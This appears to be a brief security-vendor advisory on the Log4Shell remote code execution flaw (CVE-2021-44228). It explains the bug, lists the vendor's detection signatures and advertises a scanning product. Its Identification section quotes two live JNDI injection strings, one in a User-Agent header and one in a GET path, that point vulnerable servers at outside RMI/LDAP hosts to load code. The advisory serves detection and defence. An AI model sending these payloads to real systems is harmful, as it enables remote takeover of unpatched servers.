Log4Shell Remote Code Execution (CVE-2021-44228)


Application Details

Log4j is an open source Apache logging framework that developers use to keep a record of activity within an application.


Vulnerability

An attacker could send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

The vulnerability affects services such as Amazon, Twitter, Apple iCloud, Cloudflare as well as Minecraft and many others.


Identification

Exploit PoCs have been published showing HTTP requests using the URL or the User Agent field, but absolutely any input field that is controlled by an attacker, and passed to the log4j library can lead to remote code execution.


Here are just a couple of examples of a request:

User-Agent: ${jndi:rmi://10.10.10.10:1099/djf6hl}
GET /$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D HTTP/1.1

Detection

By creating a number of traffic files and corresponding rules we are able to detect attempts to perform remote code execution on an affected system.


Coverage

Idappcom have created signatures 8022160-8022163 and 8022175 for this vulnerability.

UPDATE: Due to the severity and ongoing threat of this exploit we have also created signatures 8022176-8022180.

References

CVE-2021-44228

Lunasec Blog


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional